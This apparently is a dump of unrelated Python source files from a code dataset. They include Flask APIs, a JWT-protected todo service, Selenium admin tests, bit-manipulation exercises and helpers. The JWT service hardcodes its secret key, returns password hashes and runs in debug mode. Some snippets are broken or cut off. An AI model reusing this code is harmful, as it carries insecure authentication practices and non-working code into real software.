abort(422)\n greetings[info['lang']] = info['greeting']\n return jsonify({'greetings':greetings})\n\nif __name__ == '__main__':\n app.run()","sub_path":"FlaskRecap/FlaskRecap.py","file_name":"FlaskRecap.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418196184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'victor'\n\nimport json\nfrom api import app\nfrom flask import request, g, jsonify, make_response\n\nimport os\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../nlp'))\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../util'))\n\nimport db as dbcon\nfrom common import dbutil\nfrom score.end import RankScorer\n\nimport time\nimport multiprocessing\n\n@app.route(\"/api/search/collection\", methods=['GET', 'POST', 'OPTIONS'])\ndef collection():\n\n query = json.loads(request.data)\n colid = query.get('id')\n results = make_query(query)\n\n p = multiprocessing.Process(target=update_collection, args=(colid, results, True, query.get('update', False)))\n p.start()\n time.sleep(2)\n return make_response(jsonify({'success': True}))\n # return update_collection(colid, results, update=query.get('update', False))\n\n\ndef make_query(query):\n\n query['size'] = max(query.get('size', 0), 10000)\n # query['size'] = 1536\n rounds = query.get('round', [])\n if 1000 in rounds and (0 not in rounds):\n query.setdefault('round', []).append(0)\n return g.sc.search('company', **query)\n\n\ndef update_collection(colid, results, in_flask=True, update=False):\n\n # update collecion\n update_counts = 0\n updates = []\n db = dbcon.connect_torndb()\n if results.get('company'):\n # dbutil.clear_collection(db, colid)\n cids = [db.get('select id from company where code=%s', code).id for code in results.get('company').get('data')]\n\n # remove old companies that are no longer in this collection\n if update:\n olds = dbutil.get_collection_companies(db, colid)\n remove = [old for old in olds if old not in cids]\n dbutil.clear_collection(db, colid, True, remove)\n # time.sleep(0.0002)\n cids.reverse()\n for cid in cids:\n update_status = dbutil.update_collection(db, colid, cid)\n update_counts += update_status\n if update_status > 0:\n updates.append(cid)\n if in_flask:\n dbutil.set_collection_process_status(db, colid)\n db.close()\n return make_response(jsonify({'success': True}))\n else:\n time.sleep(1)\n # for cid in updates:\n # dbutil.update_collection(db, colid, cid)\n dbutil.set_collection_process_status(db, colid)\n db.close()\n if in_flask:\n dbutil.clear_collection(db, colid)\n db.close()\n return make_response(jsonify({'success': False}))\n return updates\n","sub_path":"data/search/api/views/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523975749","text":"\"\"\"\nQuestion 53:\nDefine a class named Rectangle which can be constructed by a length and width. The Rectangle\nclass has a method which can compute the area.\n\"\"\"\ninput_length = input(\"Write length here: \")\ninput_width = input(\"Write width here: \")\n\nclass Rectangle:\n\t\"\"\"\n\tClass to find area of rectangle.\n\t\"\"\"\n\t@staticmethod\n\tdef area(l,b):\n\t\t\"\"\"\n\t\tparam:l,b\n\t\treturn:area of rectangle.\n\t\t\"\"\"\n\t\treturn l*b\n\n# Callin static method of Circle class.\narea = Rectangle.area(input_length,input_width)\nprint(area)\n","sub_path":"p53.py","file_name":"p53.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"377433422","text":"#!/usr/bin/python3\n# main OnlySnarf class\n\nimport random\nimport os\nimport shutil\nimport datetime\nimport json\nimport sys\nimport pathlib\nimport time\n##\nfrom . import cron as Cron\nfrom .classes import Discount, Promotion\nfrom .driver import Driver\nfrom .settings import Settings\nfrom .user import User\nfrom .profile import Profile\n\n#####################\n##### OnlySnarf #####\n#####################\n\nclass Snarf:\n\n def __init__(self):\n pass\n # self.profile = Profile({})\n\n ####################\n ##### Discount #####\n ####################\n\n @staticmethod\n def discount(discount=None):\n if not discount: discount = Settings.get_discount()\n try: discount.apply()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n ################\n ##### Exit #####\n ################\n\n @staticmethod\n def exit():\n if Settings.is_show_window():\n Settings.maybe_print(\"Skipping: Window Close\")\n return\n Driver.exit()\n\n ###################\n ##### Message #####\n ###################\n\n @staticmethod\n def message(message=None):\n if not message: message = Settings.get_message()\n try: message.send()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n \n ################\n ##### Post #####\n ################\n\n @staticmethod\n def post(message=None):\n if not message: message = Settings.get_message()\n try: message.post()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n ###################\n ##### Profile #####\n ###################\n\n @staticmethod\n def profile(profile=None):\n if not profile: profile = Settings.get_profile()\n try: profile.update()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n \n #####################\n ##### Promotion #####\n #####################\n\n # def give_trial(user):\n # print(\"Applying Promotion: \"+user)\n # link = Driver.get_new_trial_link()\n # text = \"Here's your free trial link!\\n\"+link\n # Settings.dev_print(\"Link: \"+str(text))\n # # Settings.send_email(email, text)\n\n @staticmethod\n def promotion(promotion=None):\n if not promotion: promotion = Settings.get_promotion()\n try: promotion.apply_to_user()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n #################\n ##### Reset #####\n #################\n\n @staticmethod\n def reset():\n Driver.reset()\n\n #################\n ##### Users #####\n #################\n\n @staticmethod\n def get_following():\n users = []\n try: users = User.get_following()\n except Exception as e: Settings.dev_print(e)\n return users\n\n @staticmethod\n def get_users():\n users = []\n try: users = User.get_all_users()\n except Exception as e: Settings.dev_print(e)\n return users\n\n ###############\n ##### Dev #####\n ###############\n\n @staticmethod\n def test():\n print('0/3 : Deleting Locals')\n print('1/3 : Testing')\n print('TESTING: Users')\n response = Driver.users_get()\n # return True\n print('TESTING: Following')\n response = Driver.following_get()\n # return True\n print('TESTING: Settings - Get')\n response = Driver.settings_get_all()\n return True\n print('TESTING: Cron')\n response = Cron.test()\n if not response or response == None:\n print(\"Error: Failed to test crons\")\n reset_ = reset()\n if not reset_:\n return print(\"Error: Failed to Reset\")\n return True\n\n################################################################################################################################################\n\ndef main():\n # try:\n from .file import File\n File.remove_local()\n Settings.set_prompt(False)\n Settings.set_confirm(False)\n action = Settings.get_action()\n print(\"Running - {}\".format(action))\n ## Actions\n success = False\n if str(action) == \"test\":\n success = Snarf.test()\n elif str(action) == \"post\":\n success = Snarf.post()\n elif str(action) == \"message\":\n success = Snarf.message()\n elif str(action) == \"discount\":\n success = Snarf.discount()\n elif str(action) == \"promotion\":\n success = Snarf.promotion()\n elif str(action) == \"profile\":\n success = Snarf.profile()\n else:\n print(\"Warning: Missing Method\")\n Snarf.exit()\n # except Exception as e:\n # Settings.dev_print(e)\n # print(\"Shnarf!\")\n # finally:\n # sys.exit(0)\n\n################################################################################################################################################\n\nif __name__ == \"__main__\":\n main()","sub_path":"OnlySnarf/src/snarf.py","file_name":"snarf.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"271912422","text":"#!/usr/bin/python\n#\n# Author: Conan Albrecht \n# License: Apache Open Source License\n# Version: 2013.10.19\n#\n__doc__ = '''\n This file is used by base_app/templates/base_template.htm to automatically include the .css, .cssm, .js, and .jsm\n files into a template hierarchy.\n \n For example, suppose we have the following template chain:\n Base template: /base_app/templates/base_template.htm\n Child template: /calculator/templates/index.html\n\n Because of this chain, the following styles and scripts are automatically included in the rendered page:\n\n /base_app/styles/base.css\n /base_app/styles/base.cssm (this one can contain dynamic Python code)\n /calculator/styles/index.css\n /calculator/styles/index.cssm (this one can contain dynamic Python code)\n /base_app/scripts/base.js\n /base_app/scripts/base.jsm (this one can contain dynamic Python code)\n /calculator/scripts/index.js\n /calculator/scripts/index.jsm (yep, you guessed it, this one can contain dynamic Python code)\n \n This file makes the above happen. It allows the programmer to separate the HTML, CSS, and JS into separate\n files but still have them serve to the browser together. It also keeps the CSS and JS together with the HTML\n at each specific level in the template inheritance chain. \n \n Note that with this Django starter kit, we recreate the static renderer each time.\n At deployment, it would speed things up considerably to cache these StaticRenderer\n objects in a dict or other type of cache. This isn't done here to keep things simpler.\n'''\n\nfrom django.conf import settings\nfrom base_app.controller import MakoTemplateRenderer\nimport os, os.path, time\n\n\n######################################################################\n### Get the minute the server started. On some browsers, new CSS/JS\n### doesn't load because the browser waits for 7 (or whatever) days\n### to check for a new version. This value is set by your web server,\n### and it's normally a good thing to speed everything up. However,\n### when you upload new CSS/JS, you want all browsers to download the new\n### files even if their cached version hasn't expired yet.\n###\n### By adding an int to the end of the .css and .js files, browsers will\n### see the files as *new* every time you restart your web server.\nSERVER_START_MINUTE = int(time.time() / 60) # minutes since Jan 1, 1970\n\n\n#######################################################################\n### A dict of template renderers for scripts and styles in our apps.\n\nSCRIPT_RENDERERS = {}\nSTYLE_RENDERERS = {}\nfor appname in settings.MAKO_ENABLED_APPS:\n SCRIPT_RENDERERS[appname] = MakoTemplateRenderer(appname, 'scripts')\n STYLE_RENDERERS[appname] = MakoTemplateRenderer(appname, 'styles')\n\n\n\n#######################################################################\n### Template-specific CSS and JS, both static and mako-rendered\n\nclass TemplateInfo(object):\n '''Data class that holds information about a template's directories. The StaticRenderer\n object below creates a TemplateInfo object for each level in the Mako template inheritance\n chain.\n '''\n def __init__(self, template):\n # set up the directories so we can go through them fast on render\n self.template_dir, self.template_name = os.path.split(os.path.splitext(template.filename)[0])\n self.app_dir = os.path.dirname(self.template_dir)\n self.app = os.path.split(self.app_dir)[1]\n # the static templatename.css file\n self.css = None\n if os.path.exists(os.path.join(self.app_dir, 'styles', self.template_name + '.css')):\n self.css = '' % (os.path.join(settings.STATIC_URL, self.app, 'styles', self.template_name + '.css'), SERVER_START_MINUTE)\n # the mako-rendered templatename.cssm file\n self.cssm = None\n if os.path.exists(os.path.join(self.app_dir, 'styles', self.template_name + '.cssm')):\n self.cssm = self.template_name + '.cssm'\n # the static templatename.js file\n self.js = None\n if os.path.exists(os.path.join(self.app_dir, 'scripts', self.template_name + '.js')):\n self.js = '' % (os.path.join(settings.STATIC_URL, self.app, 'scripts', self.template_name + '.js'), SERVER_START_MINUTE)\n # the mako-rendered templatename.jsm file\n self.jsm = None\n if os.path.exists(os.path.join(self.app_dir, 'scripts', self.template_name + '.jsm')):\n self.jsm = self.template_name + '.jsm'\n \n\nclass StaticRenderer(object):\n '''The styles and scripts for a given template.'''\n def __init__(self, mako_self):\n # get the inheritance chain for this template\n self.template_infos = []\n while mako_self != None:\n self.template_infos.insert(0, TemplateInfo(mako_self.template)) # go in reversed order so the most specialized template CSS/JS prints last and wins in a conflict\n mako_self = mako_self.inherits\n\n\n def get_template_css(self, request, context):\n '''Retrives the static and mako-rendered CSS'''\n ret = []\n for ti in self.template_infos:\n if ti.css:\n ret.append(ti.css) # the was already created once in the constructor\n if ti.cssm:\n ret.append('' % STYLE_RENDERERS[ti.app].render(request, ti.cssm, context.kwargs)) \n return '\\n'.join(ret)\n\n\n def get_template_js(self, request, context):\n '''Retrieves the static and mako_rendered CSS''' \n ret = []\n for ti in self.template_infos:\n if ti.js:\n ret.append(ti.js) # the ' % SCRIPT_RENDERERS[ti.app].render(request, ti.jsm, context.kwargs))\n return '\\n'.join(ret)\n\n\n","sub_path":"base_app/static_files.py","file_name":"static_files.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"302085160","text":"from flask import Flask, config, request, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import Integer, String, Column, Boolean\nfrom flask_session import Session\nimport uuid,jwt,datetime\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom functools import wraps\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'thisissecreet'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n public_id = db.Column(db.String(50), unique=True)\n name = db.Column(db.String(80))\n password = db.Column(db.String(80))\n admin = db.Column(db.Boolean)\n\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n text = db.Column(db.String(100))\n complate = db.Column(db.Boolean)\n user_id = db.Column(db.Integer)\n\n\ndef token_required(f):\n @wraps(f)\n def decorated(*args,**kwargs):\n token=None\n if 'x-access-token' in request.headers:\n token=request.headers['x-access-token']\n if not token:\n return jsonify({'message':'Token is missing !!'}),401\n \n try:\n print(token)\n data=jwt.decode(token, app.config['SECRET_KEY'])\n print(data)\n current_user=User.query.filter_by(public_id=data['public_id']).first()\n except:\n return jsonify({'message':'Token is invalid !!'}),401\n return f(current_user,*args,**kwargs)\n return decorated\n \n\n@app.route('/user', methods=['GET'])\n@token_required\ndef get_all_user(current_user):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n users = User.query.all()\n output = []\n for user in users:\n user_data = {}\n user_data['public_id'] = user.public_id\n user_data['name'] = user.name\n user_data['password'] = user.password\n user_data['admin'] = user.admin\n output.append(user_data)\n return jsonify({'users': output})\n\n\n@app.route('/user/', methods=['GET'])\n@token_required\ndef get_one_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n user_data = {}\n user_data['public_id'] = user.public_id\n user_data['name'] = user.name\n user_data['password'] = user.password\n user_data['admin'] = user.admin\n return jsonify({'user': user_data})\n\n\n@app.route('/user', methods=['POST'])\n@token_required\ndef create_user(current_user):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n data = request.get_json()\n hash_password = generate_password_hash(data['password'], method='sha256')\n new_user = User(public_id=str(uuid.uuid4()),\n name=data['name'], password=hash_password, admin=False)\n db.session.add(new_user)\n db.session.commit()\n return jsonify({'message': 'New user Created !!!'})\n\n\n@app.route('/user/', methods=['PUT'])\n@token_required\ndef promote_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n user.admin = True\n db.session.commit()\n return jsonify({'message': 'The user has promoted !!!'})\n\n\n@app.route('/user/', methods=['DELETE'])\n@token_required\ndef delete_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n db.session.delete(user)\n db.session.commit()\n return jsonify({'message': 'The user has been deleted !!!'})\n\n\n@app.route('/login')\ndef login():\n auth = request.authorization\n if not auth or not auth.username or not auth.password:\n return make_response('Could not verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n user = User.query.filter_by(name=auth.username).first()\n if not user:\n return make_response('Could not user is verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n \n if check_password_hash(user.password, auth.password):\n token = jwt.encode({'public_id': user.public_id, \n 'exp': datetime.datetime.utcnow()+datetime.timedelta(minutes=30)}, \n app.config['SECRET_KEY'])\n # return jsonify({'token':token.decode('UTF-8')})\n return jsonify({'token':token.decode('UTF-8')})\n return make_response('Could not verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n \n\n@app.route('/todo', methods=['GET'])\n@token_required\ndef get_all_todos(current_user):\n todos = Todo.query.all()\n output = []\n for todo in todos:\n todo_data = {}\n todo_data['id'] = todo.id\n todo_data['text'] = todo.text\n todo_data['complate'] = todo.complate\n output.append(todo_data)\n return jsonify({'todos': output})\n\n\n@app.route('/todo/', methods=['GET'])\n@token_required\ndef get_one_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'No todo found !!!'})\n todo_data = {}\n todo_data['id'] = todo.id\n todo_data['text'] = todo.text\n todo_data['complate'] = todo.complate\n return jsonify({'user': todo_data})\n\n\n@app.route('/todo', methods=['POST'])\n@token_required\ndef create_todo(current_user):\n data = request.get_json()\n new_todo = Todo(text=data['text'],complate=False,user_id=current_user.id)\n db.session.add(new_todo)\n db.session.commit()\n return jsonify({'message': 'Todo Created !!!'})\n\n\n@app.route('/todo/', methods=['PUT'])\n@token_required\ndef promote_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'Todo item is not found !!!'})\n todo.complate = True\n db.session.commit()\n return jsonify({'message': 'Todo item has been complated !!!'})\n\n\n@app.route('/todo/', methods=['DELETE'])\n@token_required\ndef delete_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'Todo not found !!!'})\n db.session.delete(todo)\n db.session.commit()\n return jsonify({'message': 'Todo has been deleted !!!'})\n\n\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(debug=True)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145632817","text":"# -*- coding: utf-8 -*-\r\n\"\"\" \r\n@date: Sat Jan 22 10:36:03 2022\r\n@author: rstreppa ( roberto.strepparava@gmail.com )\r\n@company: https://github.com/rstreppa\r\n@type: lib\r\n@description: simple bit manipulation problems\r\n\"\"\"\r\n\r\nimport operator\r\nimport math\r\n\r\ndef singleNumber(nums):\r\n ''' https://hackernoon.com/xor-the-magical-bit-wise-operator-24d3012ed821\r\n Solution using XOR\r\n \r\n Bitwise XOR ( ^ ) like the other operators (except ~) \r\n also take two equal-length bit patterns. \r\n If both bits in the compared position of the bit patterns are 0 or 1, \r\n the bit in the resulting bit pattern is 0, otherwise 1.\r\n '''\r\n res = 0\r\n for num in nums:\r\n res ^= num\r\n return res\r\n\r\ndef isPowerof2(x):\r\n ''' Logic: All the power of 2 have only single bit set e.g. 16 (00010000).\r\n \tIf we minus 1 from this, all the bits from LSB to set bit get toggled,\r\n ., 16 - 1 = 15 (00001111).Now if we AND x with(x - 1) and the result is 0\r\n\t then we can say that x is power of 2 otherwise not.\r\n\t We have to take extra care when x = 0.\r\n '''\r\n return x and operator.not_( operator.and_( x, x-1 ) ) \r\n\r\ndef log2(x):\r\n ''' log2 by right shift''' \r\n res = 0\r\n while x:\r\n x = operator.rshift(x, 1)\r\n res += 1\r\n return res-1\r\n\r\ndef myswap(a, b):\r\n ''' swap using XOR logic without extra variable ''' \r\n a ^= b\r\n b ^= a\r\n a ^= b\r\n return a, b\r\n\r\ndef power2( n ):\r\n ''' power of 2 by left shift''' \r\n return operator.lshift(1, n)\r\n\r\ndef rightmostOne(n):\r\n ''' Return the rightmost 1 in the binary representation of a number. \r\n The property is, the difference between a binary number n and n-1 is \r\n all the bits on the right of the rightmost 1 are flipped including the rightmost 1. \r\n '''\r\n return n ^ operator.and_(n, n-1)\r\n \r\n \r\ndef binaryArray(n):\r\n ''' return an array of the binary representation of a number'''\r\n binary = []\r\n while n:\r\n binary.append( n % 2 )\r\n n = math.floor( n / 2 )\r\n return binary[::-1] \r\n \r\ndef countBits(n):\r\n ''' Given an integer n, return an array ans of length n + 1 such that for each i (0 <= i <= n), \r\n ans[i] is the number of 1's in the binary representation of i\r\n '''\r\n res = []\r\n for i in range(n+1):\r\n res.append(sum(binaryArray(i)))\r\n return res\r\n\r\ndef countBits2(n):\r\n ''' Can you do it in linear time O(n) and possibly in a single pass? \r\n All whole numbers can be represented by 2N (even) and 2N+1 (odd).\r\n For a given binary number, multiplying by 2 is the same as adding a zero at the end \r\n (just as we just add a zero when multiplying by ten in base 10).\r\n Since multiplying by 2 just adds a zero, then any number and its double will have the same number of 1's. \r\n Likewise, doubling a number and adding one will increase the count by exactly 1. Or: \r\n countBits(N) = countBits(2N)\r\n countBits(N)+1 = countBits(2N+1)\r\n Thus we can see that any number will have the same bit count as half that number, \r\n with an extra one if it's an odd number. We iterate through the range of numbers \r\n and calculate each bit count successively in this manner: \r\n ''' \r\n dp = [0] * (n+1)\r\n for i in range(1, n+1):\r\n dp[i] = dp[i//2] + i%2\r\n return dp\r\n\r\ndef divide(dividend, divisor):\r\n \"\"\"\r\n\t29. Divide Two Integers\r\n\tMedium\r\n\tGiven two integers dividend and divisor, divide two integers without using multiplication, division, and mod operator.\r\n\tThe integer division should truncate toward zero, which means losing its fractional part. For example, 8.345 would be truncated to 8, \r\n\tand -2.7335 would be truncated to -2.\r\n\tReturn the quotient after dividing dividend by divisor.\r\n\tNote: Assume we are dealing with an environment that could only store integers within the 32-bit signed integer range: [−231, 231 − 1]. \r\n\tFor this problem, if the quotient is strictly greater than 231 - 1, then return 231 - 1, and if the quotient is strictly less than -231, then return -231. \r\n\r\n\tHow can we improve this 🤔? What if instead of decreasing the dividend linearly, we decrease it exponentially? \r\n\tThis will definitely improve the performance drastically.\r\n\r\n\tWe can follow the below steps —\r\n\r\n\tA variable quotient will keep the track of answer.\r\n\tA while loop will check the condition dividend >= divisor\r\n\tInside this while loop, we will have one variable shift which will left shift the divisor by one bit and check if the result is less than the dividend. This will repeat until the condition is false.\r\n\tOnce, we are out of inner loop, then we will add the number of times we shifted to the quotient.\r\n\tAlso, we will now subtract the result of shifting to divisor from the dividend for the next iteration. Remember that since in the while loop the value of shifting had gone beyond the dividend, the value we need to subtract is one bit less shifted.\r\n\tWe will repeat the process unless we reach to the point where divisor is greater than dividend.\r\n\tYou must be wondering that why are we shifting the bits? The answer is, one left shift bit means the number is doubled. And since we cannot use multiplication, we are using left shifting.\r\n\r\n\tx << y\r\n\tReturns x with the bits shifted to the left by y places (and new bits on the right-hand-side are zeros). This is the same as multiplying x by 2**y.\r\n\tx >> y\r\n\tReturns x with the bits shifted to the right by y places. This is the same as //'ing x by 2**y.\r\n\t\r\n\t:type dividend: int\r\n\t:type divisor: int\r\n\t:rtype: int\r\n \"\"\"\r\n # MAX and MIN values for integer\r\n MAX = 2147483647\r\n MIN = -2147483648\r\n # Check for overflow\r\n if divisor == 0 or (dividend == MIN and divisor == -1):\r\n return MAX\r\n # Sign of result`\r\n sign = -1 if (dividend > 0 and divisor < 0) or (dividend < 0 and divisor > 0) else 1\r\n # Quotient\r\n quotient = 0\r\n # Take the absolute value\r\n absoluteDividend = abs(dividend)\r\n absoluteDivisor = abs(divisor)\r\n # Loop until the dividend is greater than divisor\r\n while absoluteDividend >= absoluteDivisor:\r\n # This represents the number of bits shifted or\r\n # how many times we can double the number\r\n shift = 0\r\n while absoluteDividend >= (absoluteDivisor << shift):\r\n shift += 1\r\n # Add the number of times we shifted to the quotient\r\n quotient += (1 << (shift - 1))\r\n # Update the dividend for the next iteration\r\n absoluteDividend -= absoluteDivisor << (shift - 1)\r\n return -quotient if sign == -1 else quotient\r\n \r\n","sub_path":"Algorithms/bitmanipulation.py","file_name":"bitmanipulation.py","file_ext":"py","file_size_in_byte":6703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"574644590","text":"from page_objects.admin_login import AdminLogin\nfrom page_objects.admin_page import AdminPage\nfrom page_objects.utils import Utils\n\nimport yaml\n\nconf = yaml.safe_load(open('configuration.yml'))\n\nemail = conf['admin']['email']\npassword = conf['admin']['password']\n\nproduct_name = conf['new']['product_name']\nmeta_tag_title = conf['new']['meta_tag_title']\nmodel = conf['new']['model']\nprice = conf['new']['price']\nmin_quantity = conf['new']['min_quantity']\n\n\ndef admin_authorization(browser):\n \"\"\"\n Авторизация под учетной записью администратора\n :param browser:\n \"\"\"\n\n browser.log.info('Starting admin_authorization')\n\n admin_login = AdminLogin(browser.wd)\n admin_page = AdminPage(browser.wd)\n\n # Открывам страницу администратора:\n browser.open_admin_page()\n\n # Очищаем поля и username вводим данные для авторизации:\n admin_login.fill_username(email)\n\n # Очищаем поля и password вводим данные для авторизации:\n admin_login.fill_password(password)\n\n # Нажимаем кнопку Login для входа в аккаунт:\n admin_login.login_button()\n\n browser.log.info('Logging out')\n try:\n admin_page.logout()\n except Exception as e:\n browser.log.error(f'Exception - {e}')\n\n\ndef open_products_from_catalog(browser):\n \"\"\"\n Navigation -> Catalog -> Products\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # В разделе Navigation выбираем Catalog:\n admin_page.click_catalog()\n\n # В разделе Catalog выбираем Products:\n admin_page.click_products()\n\n\ndef add_product(browser):\n \"\"\"\n Добавление продукта\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Ищем поле \"Product name\", очищаем и вводим данные:\n admin_page.fill_product_name(product_name)\n\n # Ищем поле \"Meta tag title\", очищаем и вводим данные:\n admin_page.fill_meta_tag_title(meta_tag_title)\n\n # В навигационное панеле ищем \"Data\" и нажимаем:\n admin_page.click_navigation_data()\n\n # Ищем поле \"Model\", очищаем и вводим данные:\n admin_page.fill_model(model)\n\n # Ищем поле \"Price\", очищаем и вводим данные:\n admin_page.fill_price(price)\n\n # Ищем поле \"Minimum Quantity\", очищаем и вводим данные:\n admin_page.fill_min_quantity(min_quantity)\n\n\ndef test_add_new_product(browser):\n \"\"\"\n Добавление нового продукта в Product List\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Ищем кнопку \"Add new\" и нажимаем на нее:\n admin_page.add_new_button()\n\n # Добавляем продукт:\n add_product(browser)\n\n # Ищем кнопку \"Save\" и нажимаем на нее:\n admin_page.save_button()\n\n # Проверяем успешность добавления нового продукта в Product List:\n alert_success = admin_page.alert_success()\n\n # Проверяем успешность добавления нового продукта в Product List:\n assert 'Success: You have modified products!' in alert_success\n\n\ndef test_edit_product(browser):\n \"\"\"\n Изменение продукта в Product List\n :param browser:\n \"\"\"\n\n admin_page = AdminPage(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Выбираем продукт для измения и нажимаем на него:\n admin_page.product_for_edit()\n\n # Ищем кнопку \"Edit\" и нажимаем на нее:\n admin_page.edit_button()\n\n # Вводим данные нового продукта:\n add_product(browser)\n\n # Ищем кнопку \"Save\" и нажимаем на нее:\n admin_page.save_button()\n\n # Проверяем успешность изменения продукта в Product List:\n alert_success = admin_page.alert_success()\n assert 'Success: You have modified products!' in alert_success\n\n\ndef test_delete_product(browser):\n \"\"\"\n Удаление продукта из Product List\n :param browser:\n :return:\n \"\"\"\n admin_page = AdminPage(browser.wd)\n utils = Utils(browser.wd)\n\n # Авторизация под учетной записью администратора:\n admin_authorization(browser)\n\n # Navigation -> Catalog -> Products:\n open_products_from_catalog(browser)\n\n # Выбираем продукт для удаления:\n admin_page.product_for_delete()\n\n # Ищем кнопку \"Delete\" и нажимаем на нее:\n admin_page.delete_button()\n\n # Подтверждаем действие удаления на странице браузера:\n utils.accept_alert()\n\n # Проверяем успешность удаления продукта из Product List:\n alert_success = admin_page.alert_success()\n assert 'Success: You have modified products!' in alert_success\n","sub_path":"05_11_Selenium/tests/12_Work_with_elements_test.py","file_name":"12_Work_with_elements_test.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141490244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 18:06:38 2020\r\n\r\n@author: LENOVO\r\n\"\"\"\r\n\r\n\r\n# Deber grafica Excell\r\n\r\nimport pandas as pd\r\nimport xlsxwriter\r\n\r\npath_guardado = \"./data/artwork_data.pickle\"\r\n\r\ndf = pd.read_pickle(path_guardado)\r\n\r\nsub_df = df.iloc[49980:50519,:].copy()\r\nnum_artistas = sub_df[\"artist\"].value_counts()\r\n\r\n\r\nworkbook = xlsxwriter.Workbook('grafica_excel.xlsx')\r\nworksheet = workbook.add_worksheet()\r\n\r\nworksheet.write_column('A1', num_artistas.index)\r\nworksheet.write_column('B1', num_artistas)\r\n\r\nchart = workbook.add_chart({'type': 'line'})\r\n\r\n\r\nchart.add_series({\r\n 'name': 'Artistas',\r\n 'categories': '=Sheet1!$A$1:$A$85',\r\n 'values': '=Sheet1!$B$1:$B$85',\r\n 'marker': {'type' : 'circle'}\r\n \r\n})\r\n\r\nworksheet.insert_chart('D2', chart)\r\n\r\n\r\n\r\nworkbook.close()\r\n","sub_path":"03-Pandas/grafico_excel.py","file_name":"grafico_excel.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153038296","text":"#matplotlib inline\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom tensorboardX import SummaryWriter\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import make_grid\nfrom tqdm import tqdm, trange\nimport pandas as pd\n\nprefix = \"_lf_phoneme_\"\n# define the summary writer\nwriter = SummaryWriter()\nsns.set()\nsns.set_style(\"dark\")\nsns.set_palette(\"muted\")\nsns.set_color_codes(\"muted\")\n\n# select the device\nDEVICE = torch.device(\"cuda:2\" if torch.cuda.is_available() else \"cpu\")\nLOADER_KWARGS = {'num_workers': 1, 'pin_memory': True} if torch.cuda.is_available() else {}\ncuda = torch.cuda.set_device(2)\n\nif (torch.cuda.is_available()):\n print(\"GPUs are used!\")\nelse:\n print(\"CPUs are 